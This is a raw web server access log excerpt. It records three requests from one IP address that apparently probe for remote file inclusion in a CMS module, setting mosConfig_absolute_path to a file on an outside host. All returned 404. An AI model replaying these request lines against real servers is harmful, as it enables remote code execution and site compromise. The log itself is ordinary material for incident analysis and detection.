124.0.74.195 - - [11/May/2010:08:41:13 -0500] "GET /logs/access_log.1262476800//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:41:13 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:41:38 -0500] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
